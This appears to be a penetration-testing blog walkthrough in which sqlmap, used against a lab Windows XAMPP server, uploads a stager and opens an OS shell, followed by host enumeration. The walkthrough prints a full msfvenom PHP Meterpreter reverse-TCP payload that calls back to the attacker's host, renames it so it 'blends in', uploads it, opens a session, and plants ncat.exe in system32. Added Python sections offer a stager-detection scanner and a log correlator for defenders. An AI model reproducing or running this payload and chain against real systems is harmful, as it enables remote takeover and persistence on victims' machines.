[13:42:17] [INFO] going to use a web backdoor for command prompt
[13:42:17] [INFO] fingerprinting the back-end DBMS operating system
[13:42:18] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP

From the above, we choose "[4] PHP".

do you want sqlmap to further try to provoke the full path disclosure? [Y/n] 
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] 
[13:43:20] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 4
Next I chose the brute force search to upload a file to give us a shell. As can be seen below, various locations are tried and the file is eventually uploaded.

use any additional custom directories [Enter for None]: 
[13:49:55] [WARNING] unable to automatically parse any web server path
[13:49:55] [INFO] trying to upload the file stager on '/xampp/' via LIMIT 'LINES TERMINATED BY' method
[13:49:55] [WARNING] unable to upload the file stager on '/xampp/'
[13:49:55] [INFO] trying to upload the file stager on '/xampp/' via UNION method
[13:49:55] [WARNING] expect junk characters inside the file as a leftover from UNION query
[13:49:55] [INFO] the remote file '/xampp/tmpufnkt.php' is larger (701 B) than the local file '/tmp/sqlmaptm_zmipy4631/tmpdhp84kj_' (700B)                                                                                                  ...
[15:52:35] [INFO] trying to upload the file stager on '/xampp/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[15:52:35] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://10.0.0.108:80/tmpuevkq.php
[15:52:36] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://10.0.0.108:80/tmpbfkst.php
[15:52:36] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER

os-shell> 

... above we see "os-shell>" and "the file stager has been successfully uploaded on '/xampp/htdocs/' - http://10.0.0.108:80/tmpuevkq.php".

Testing the shell, we see:

BREAK          Sets or clears extended CTRL+C checking.
BCDEDIT        Sets properties in boot database to control boot loading.
CACLS          Displays or modifies access control lists (ACLs) of files.
CALL           Calls one batch program from another.
CD             Displays the name of or changes the current directory.
CHCP           Displays or sets the active code page number.
CHDIR          Displays the name of or changes the current directory.
CHKDSK         Checks a disk and displays a status report.
CHKNTFS        Displays or modifies the checking of disk at boot time.
CLS            Clears the screen.
CMD            Starts a new instance of the Windows command interpreter.
< ... truncated for brevity .... >
VOL            Displays a disk volume label and serial number.
XCOPY          Copies files and directory trees.
WMIC           Displays WMI information inside interactive command shell.

For more information on tools see the command-line reference in the online help.
---
os-shell> 

Looking at the processes on the system via "wmic process list brief".

os-shell> wmic process list brief
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
HandleCount  Name                       Priority  ProcessId  ThreadCount  WorkingSetSize  
0            System Idle Process        0         0          2            8192            
1974         System                     8         4          99           139264          
52           smss.exe                   11        312        2            987136          
<.... Truncated for brevity .... >   
276          taskhostw.exe              8         1732       4            17592320        
193          svchost.exe                8         5576       4            7356416         
62           cmd.exe                    8         4332       2            3862528         
108          conhost.exe                8         4996       3            10129408        
192          WMIC.exe                   8         5076       6            11042816        
157          WmiPrvSE.exe               8         6520       9            8593408 
....

Looking at the users on the system.

---
os-shell> wmic useraccount
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
AccountType  Caption                             Description                                                                                      Disabled  Domain           FullName  InstallDate  LocalAccount  Lockout  Name                PasswordChangeable  PasswordExpires  PasswordRequired  SID                                           SIDType  Status    
512          SECURITYNIK-WIN\Administrator      Built-in account for administering the computer/domain                                           FALSE     SECURITYNIK-WIN                         TRUE          FALSE    Administrator       TRUE                FALSE            TRUE              S-1-5-21-3846991316-327138358-508696823-500   1        OK        
512          SECURITYNIK-WIN\DefaultAccount     A user account managed by the system.                                                            TRUE      SECURITYNIK-WIN                         TRUE          FALSE    DefaultAccount      TRUE                FALSE            FALSE             S-1-5-21-3846991316-327138358-508696823-503   1        Degraded  
512          SECURITYNIK-WIN\Guest              Built-in account for guest access to the computer/domain                                         TRUE      SECURITYNIK-WIN                         TRUE          FALSE    Guest               FALSE               FALSE            FALSE             S-1-5-21-3846991316-327138358-508696823-501   1        Degraded  
512          SECURITYNIK-WIN\SecurityNik                                                                                                         FALSE     SECURITYNIK-WIN                         TRUE          FALSE    SecurityNik         TRUE                FALSE            FALSE             S-1-5-21-3846991316-327138358-508696823-1002  1        OK        
512          SECURITYNIK-WIN\Toronto                                                                                                             FALSE     SECURITYNIK-WIN                         TRUE          FALSE    Toronto             TRUE                TRUE             TRUE              S-1-5-21-3846991316-327138358-508696823-1005  1        OK        
512          SECURITYNIK-WIN\WDAGUtilityAccount A user account managed and used by the system for Windows Defender Application Guard scenarios.  TRUE      SECURITYNIK-WIN                         TRUE          FALSE    WDAGUtilityAccount  TRUE                TRUE             TRUE              S-1-5-21-3846991316-327138358-508696823-504   1        Degraded  

---

Grab the “systeminfo” output.

os-shell> systeminfo
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---

Host Name:                 SECURITYNIK-WIN
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
...
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              SECURITYNIK-WIN
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB4053577
                           [02]: KB4054517
Network Card(s):           2 NIC(s) Installed.
                           [01]: Microsoft KM-TEST Loopback Adapter
                                 Connection Name: Npcap Loopback Adapter
                                 DHCP Enabled:    Yes
                                 DHCP Server:     255.255.255.255
                                 IP address(es)
                                 [01]: 169.254.149.255
                                 [02]: fe80::18f0:70a4:4f2c:95ff
                           [02]: Intel(R) PRO/1000 MT Desktop Adapter
                                 Connection Name: Ethernet 2
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.0.0.100
                                 IP address(es)
                                 [01]: 10.0.0.108
                                 [02]: fe80::a858:9eed:630a:53f7
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

With the information above, we can consider other devices on the network to pivot to.

There are other cool things we can do with “wmic” in this “os-shell”. However, let's switch back to our attacker machine and use a penetration tester's favorite tool to make things more interesting.

Let's start with “msfvenom”. In my example, I redirect the output to a file named “tmp.php”.

[email protected]:~$ msfvenom --payload php/meterpreter/reverse_tcp LHOST=10.0.0.107 LPORT=4443 --format raw --smallest > tmp.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1111 bytes

If I “cat” the file “tmp.php”, we see:

[email protected]:~$ cat tmp.php 
/*<?php /**/ error_reporting(0); $ip = '10.0.0.107'; $port = 4443; if (($f="stream_socket_client") && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type="stream"; } if (!$s && ($f="fsockopen") && is_callable($f)) { $s = $f($ip, $port); $s_type="stream"; } if (!$s && ($f="socket_create") && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type="socket"; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

We now need to remove the “/*” from the beginning of the file. You can simply open the file in your favorite editor and delete those two characters. I will use “cut --characters” to drop the first 2 characters and keep everything else, then redirect that output to a file named “server.php”. With that name I hope it blends in.

[email protected]:~$ cat tmp.php | cut --characters 3- > server.php
[email protected]:~$ cat server.php 
<?php /**/ error_reporting(0); $ip = '10.0.0.107'; $port = 4443; if (($f="stream_socket_client") && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type="stream"; } if (!$s && ($f="fsockopen") && is_callable($f)) { $s = $f($ip, $port); $s_type="stream"; } if (!$s && ($f="socket_create") && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type="socket"; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
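From the defender's side, the stager above has a recognisable shape: errors silenced, a socket opened to a fixed host and port, a 4-byte length read, then the received bytes passed to eval(). The following scanner scores PHP files on those traits. It is an added example, not code from the original post or from Metasploit; the indicator list, weights and threshold are my own choices, and both sample inputs are constructed.

```python
"""Score a PHP file for traits of the msfvenom php/meterpreter/reverse_tcp stager (added example)."""
import re

# (name, pattern, weight); the list and weights are my own, derived from the stager shown above.
INDICATORS = [
    ("silence_errors", re.compile(r"error_reporting\s*\(\s*0\s*\)"), 1),
    ("socket_connect", re.compile(r"stream_socket_client|fsockopen|socket_create"), 2),
    ("length_prefixed_read", re.compile(r"""unpack\s*\(\s*["']N"""), 2),
    ("dynamic_eval", re.compile(r"\beval\s*\(|create_function\s*\("), 2),
    ("msgsock_global", re.compile(r"\$GLOBALS\[.msgsock"), 3),
    ("comment_wrapped_open_tag", re.compile(r"^\s*/\*\s*<\?php"), 1),
]
THRESHOLD = 5  # assumption: a network trait plus an eval trait is enough to escalate

def score_php(source):
    """Return (total_weight, [matched indicator names]) for one PHP source string."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(source)]
    total = sum(w for name, _, w in INDICATORS if name in hits)
    return total, hits

def is_suspicious(source):
    return score_php(source)[0] >= THRESHOLD

def scan_paths(paths):
    """Scan files on disk; returns {path: (score, hits)} for those at or over the threshold."""
    flagged = {}
    for p in paths:
        with open(p, encoding="utf-8", errors="replace") as fh:
            score, hits = score_php(fh.read())
        if score >= THRESHOLD:
            flagged[p] = (score, hits)
    return flagged

# Constructed samples: a stripped-down copy of the stager's structure, and a benign socket user.
STAGER_LIKE = (
    "/*<?php /**/ error_reporting(0); $ip = '10.0.0.107'; $port = 4443; "
    "$s = stream_socket_client(\"tcp://{$ip}:{$port}\"); $len = fread($s, 4); "
    "$a = unpack(\"Nlen\", $len); $b = fread($s, $a['len']); "
    "$GLOBALS['msgsock'] = $s; eval($b); die();"
)
BENIGN = "<?php $c = fsockopen('smtp.example.test', 25); fwrite($c, \"EHLO\\r\\n\"); fclose($c);"
```

A single socket call in otherwise ordinary code (the BENIGN sample) stays under the threshold; the combination of traits is what separates the stager from legitimate PHP.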

Next we load “msfconsole” and configure “multi/handler”.

msf5 > use multi/handler

msf5 exploit(multi/handler) > set LHOST 10.0.0.107
LHOST => 10.0.0.107
msf5 exploit(multi/handler) > set LPORT 4443
LPORT => 4443
msf5 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp

Let's make sure everything looks good.

msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.0.107       yes       The listen address (an interface may be specified)
   LPORT  4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Start the listener by running “exploit”.

msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.0.0.107:4443 

Verify that the port is listening on our local system.

[email protected]:~$ sudo ss --numeric --listening --tcp --process
sudo: unable to resolve host securtynik: Temporary failure in name resolution
State         Recv-Q        Send-Q               Local Address:Port                 Peer Address:Port        Process        
LISTEN        0             256                     10.0.0.107:4443                      0.0.0.0:*            users:(("ruby",pid=3354,fd=9))

Looks like we are good to go.

Now that the attacker environment is set up, let's revisit the stager that was uploaded earlier when we got the “os-shell”. The stager is hosted at “http://10.0.0.108:80/tmpuevkq.php”, as we saw before.

If we now open our browser and paste that URL, we see:

I then click browse and select my “server.php” script.

Now let's run our script.

At this point, if we switch back to our “msfconsole”, we see:

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.0.0.107:4443 
[*] Sending stage (38288 bytes) to 10.0.0.108
[*] Meterpreter session 1 opened (10.0.0.107:4443 -> 10.0.0.108:6375) at 2020-06-24 17:03:23 -0400

meterpreter > 
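The sequence just described (stager page opened, script uploaded through it, uploaded script requested, session opened) leaves a clear trail in the web server's access log. The following correlation is an added example, not from the original post: the log lines are constructed to mirror that sequence, the stager-name pattern is generalised from the page's “tmpuevkq.php” and is an assumption, as are the five-minute window and the allowlist of known application paths.

```python
"""Correlate web access-log events around a sqlmap os-shell stager (added example)."""
import re
from datetime import datetime, timedelta

# Apache/nginx "combined" format; only the fields we need are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Generalised from the page's "tmpuevkq.php"; the exact sqlmap naming rule is an assumption.
STAGER_RE = re.compile(r"^/tmp[a-z]{5}\.php$")
# Application paths that legitimately exist (placeholder allowlist; login.php is from the page).
KNOWN_PHP = {"/dvwa/login.php"}
WINDOW = timedelta(minutes=5)  # correlation window, an assumption

def parse(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"],
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "method": m["method"],
            "path": m["path"].split("?", 1)[0],
            "status": int(m["status"])}

def find_stager_chains(lines):
    """Flag stager hits, plus any unknown .php the same client requests soon after POSTing to a stager."""
    events = [e for e in map(parse, lines) if e]
    last_upload = {}  # client ip -> time of its last POST to a stager
    alerts = []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        if STAGER_RE.match(e["path"]):
            alerts.append(("stager_request", e["ip"], e["path"], e["method"]))
            if e["method"] == "POST":
                last_upload[e["ip"]] = e["ts"]
            continue
        since = last_upload.get(e["ip"])
        if (since is not None and e["ts"] - since <= WINDOW
                and e["path"].endswith(".php") and e["path"] not in KNOWN_PHP):
            alerts.append(("possible_uploaded_script_executed", e["ip"], e["path"], e["method"]))
    return alerts

SAMPLE_LOG = [  # constructed lines mirroring the sequence in the post
    '10.0.0.107 - - [24/Jun/2020:17:01:05 -0400] "GET /dvwa/login.php HTTP/1.1" 200 1523 "-" "Mozilla/5.0"',
    '10.0.0.107 - - [24/Jun/2020:17:02:10 -0400] "GET /tmpuevkq.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.107 - - [24/Jun/2020:17:02:40 -0400] "POST /tmpuevkq.php HTTP/1.1" 200 98 "-" "Mozilla/5.0"',
    '10.0.0.107 - - [24/Jun/2020:17:03:20 -0400] "GET /server.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.0.0.50 - - [24/Jun/2020:17:03:25 -0400] "GET /dvwa/login.php HTTP/1.1" 200 1523 "-" "Mozilla/5.0"',
]
```

Running find_stager_chains(SAMPLE_LOG) yields three alerts: the GET and POST to the stager, and the later request to server.php from the same client; the unrelated client's login.php request is not flagged.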

Looks like we successfully got a session. Let's run “sysinfo”.

meterpreter > sysinfo 
Computer    : SECURITYNIK-WIN
OS          : Windows NT SECURITYNIK-WIN 10.0 build 16299 (Windows 10) i586
Meterpreter : php/windows

At this point we can upload additional tools. Here I upload ncat.exe.

meterpreter > upload ncat.exe c:\windows\system32\
[*] uploading  : ncat.exe -> c:\windows\system32\
[*] uploaded   : ncat.exe -> c:\windows\system32\ncat.exe

Before we leave, let's grab a shell.

meterpreter > shell
Process 3864 created.
Channel 6 created.
Microsoft Windows [Version 10.0.16299.125]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Windows\System32>

I leave it to your imagination what you do from here. I will close this post here, and see you in the log analysis post.
